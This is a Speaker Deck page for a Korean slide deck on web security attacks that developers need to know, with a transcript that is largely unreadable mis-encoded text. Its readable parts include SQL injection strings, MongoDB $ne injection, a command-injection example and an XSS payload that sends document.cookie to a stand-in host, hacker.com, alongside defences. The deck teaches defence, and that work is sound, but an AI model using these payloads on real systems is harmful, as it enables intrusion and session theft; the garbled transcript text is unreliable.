Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
웹 개발을 위해 꼭 알아야하는 보안 공격
Search
Lee Sun-Hyoup
February 22, 2021
Programming
0
41
웹 개발을 위해 꼭 알아야하는 보안 공격
통신보안
Lee Sun-Hyoup
February 22, 2021
Tweet
Share
More Decks by Lee Sun-Hyoup
See All by Lee Sun-Hyoup
Kotlin Script 활용하기
kciter
0
620
MongoDB 이해하기
kciter
0
660
Other Decks in Programming
See All in Programming
GitHub Copilot for Azureを使い倒したい
ymd65536
1
310
fieldalignmentから見るGoの構造体
kuro_kurorrr
0
130
カオスに立ち向かう小規模チームの装備の選択〜フルスタックTSという装備の強み _ 弱み〜/Choosing equipment for a small team facing chaos ~ Strengths and weaknesses of full-stack TS~
bitkey
1
130
ComposeでのPicture in Picture
takathemax
0
130
Thank you <💅>, What's the Next?
ahoxa
1
590
エンジニアが挑む、限界までの越境
nealle
1
310
The New Developer Workflow: How AI Transforms Ideas into Code
danielsogl
0
100
Fiber Scheduler vs. General-Purpose Parallel Client
hayaokimura
1
290
プロフェッショナルとしての成長「問題の深掘り」が導く真のスキルアップ / issue-analysis-and-skill-up
minodriven
8
1.9k
複雑なフォームの jotai 設計 / Designing jotai(state) for Complex Forms #layerx_frontend
izumin5210
6
1.5k
UMAPをざっくりと理解 / Overview of UMAP
kaityo256
PRO
3
1.4k
Contribute to Comunities | React Tokyo Meetup #4 LT
sasagar
0
590
Featured
See All Featured
How STYLIGHT went responsive
nonsquared
100
5.5k
Build The Right Thing And Hit Your Dates
maggiecrowley
35
2.7k
Adopting Sorbet at Scale
ufuk
76
9.3k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
We Have a Design System, Now What?
morganepeng
52
7.5k
Rebuilding a faster, lazier Slack
samanthasiow
81
9k
Keith and Marios Guide to Fast Websites
keithpitt
411
22k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
49k
Navigating Team Friction
lara
185
15k
Agile that works and the tools we love
rasmusluckow
329
21k
A Modern Web Designer's Workflow
chriscoyier
693
190k
The Power of CSS Pseudo Elements
geoffreycrofte
75
5.8k
Transcript
ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ࢶഈ
য়טݾ ਢࠁউী೧೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ೧ೠ
ਢࠁউ ਢࢎஂডਸҕѺೞחӝࣿਤഈਵ۽ ਢಕܳాೞৈ ӂೠহחदझమীӔೞѢաؘఠਬ߂Ҧ৬э೯ਤ݈ܳೠ https://ko.wikipedia.org/wiki/ਢ_೧ఊ
None
ೠࣽрपࣻ۽ࢲ࠺झоݎೡࣻب😨
ցޖনೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL
ࠗחইפ؊ۄبӝୡੋѪ ԙঌইىঠೠ
ঌইঠೞחҕѺӝߨ 4UBSU
42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈਵ۽ਊೞחҕѺ ↟ӝઓ42-ীঈੋ42-ਸੑೠ ↟ؘఠఎஂ ઁ١оמೞ ↟ڦܻݶࢲ࠺झઙܐп
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠܳоחޙܳझாೠ FY =O =U ] j
↟ળ࠺ػࢶਸࢎਊೠ ↟ਃ્ۄ࠳۞ܻ ۨਕীࢲইੜ݄ইળ
42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞחࠁܳஂٙೠ ↟௪ܻޙ୶ஏ %#ݺ ప࠶ݺ١ஂٙоמೞ
42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗଵѢਸࠁҊਗೞחࠁо ઓೞחঌࣻ ୶ۿ ↟%# 5BCMFݺਸঌࣻ ↟42-.BQ ex)
SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#
42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸਊೞৈࠁܳஂٙೠ ex) SELECT * FROM users WHERE user_id
= '1' or 1=1 UNION SELECT '',id,pw from users#
944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕীঈࢿझ݀ܳੑೞחҕѺ ↟ࢎਊࠁܳఎஂೡࣻ ↟ڦܻݶ݆Ѫਸח
944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ਊо Ӗਸ ੍ਸ ٸ ష ఎஂ!!!
944ߑয ↟)5.-ఠ݂ਸೠറ%#ীೠ FY TDSJQU IUNM IFBE NFUB jj
↟݅ডਸਤ೧ۿূ٘ীࢲبఠ݂ೠ
944बച ↟খࢲࣗѐೠߑध4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944
944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈחҔীझ݀ܳबחҕѺ ↟63-ਸࢎਊীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>
944बച ↟%0.#BTFE944 ↟%0.ীঈੋझ݀ܳबחҕѺ ↟࠳ۄо೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ
$43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺоࢎਊܳਊೞৈਢࢎী ਃਸࠁղחҕѺ
$43'"UUBDLࢎ۹ о admin 1q2w3e4r ۽Ӓੋ ਃ ࢿҕ/पಁ ࢿҕ೮ਵݶ
$43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃೲۅೞب۾ࢸ ↟$43'5PLFO ↟ݽٚਃীషਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈਃೠѪݏחѨૐ
$PNNBOE*OKFDUJPO ↟গܻா࣌ীࢲࢎਊغחदझమݺ۸ীঈੋ ݺ۸যܳੑೞחҕѺ 8FC4IFMM"UUBDL ↟ࢲߡSPPUӂೠਸஂٙೡࣻ ↟ڦܻݶࢲ࠺झઙܐп
$PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM
$PNNBOE*OKFDUJPOߑয ↟оәदझమೣࣻחࢎਊ9 ↟хೠޙܳఠ݂ FY ]
'JMF6QMPBE"UUBDL ↟ঈࢿझ݀ੌਸস۽٘ೞחҕѺ ↟স۽٘റੌਤܳইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп
'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell
'JMF6QMPBE"UUBDLߑয ↟ഛੌఋੑѨࢎ ↟স۽٘ੌਸդࣻചೞৈ ↟ౠࣻޙоನೣػ҃স۽٘Ә (Null byte Injection ߑয)
+BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳੑदఃחҕѺ ↟܁DPOTPMF١ਸా೧ઑоמೞ ↟$MJFOU4JEFীхೠؘఠܳ֍ਸ҃ఎஂоמ
+BWBTDSJQU*OKFDUJPOࢎ۹
+BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূхೠࠁܳ֍ঋח ↟ؘఠਬബࢿѨࢎоਃೠ҃ࢲߡ৬ాनೠ $MJFOUীࢲѨࢎೞݶউػ
%%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺࢚ਵ۽݆ېਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆࠺ਊࣗݽػ
%%P4ࢎ۹ Zombie PC Traffic
%%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵ ↟ഛоמೠࢲ࠺झҳઑࢸ҅ ↟*1ఠ݂ ↟ࣛܖ࣌ҳݒj
%JDUJPOBSZ"UUBDL ↟ܻࢎী١۾೧֬ޙৌਸঐഐ۽ੑೞחҕѺ ↟#SVUF'PSDFੌઙ
%JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r
%JDUJPOBSZ"UUBDLߑয ↟оחޙৌঐഐ۽١۾ޅೞب۾ࢸ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ
3BJOCPX5BCMF ↟೧दೣࣻܳਊೠಣޙਸݽفदெ֬ ↟҅ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ
3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١ঐഐചঌҊ્ܻࢎਊ
.POHP%#*OKFDUJPO ↟42-*OKFDUJPOۢঈੋчਸ֍য %#ܳઑೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп
.POHP%#*OKFDUJPOࢎ۹ db.collection.find({ "email": "
[email protected]
", "password": password }) db.collection.find({ "email": "
[email protected]
",
"password": { "$ne": "-" }) password = { "$ne": "-" }
.POHP%#*OKFDUJPOߑয ↟ೱਸࣻחޙܳఠ݂ೠ FY \ ^ < >
#VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧ܲݫݽܻীӔೞחҕѺ ↟ܲݫݽܻীӔ߂ઁযооמೞӝٸޙীݺ ↟दझమ೧ఊӝߨӝبೞ ↟ڦܻݶࢲ࠺झઙܐп
None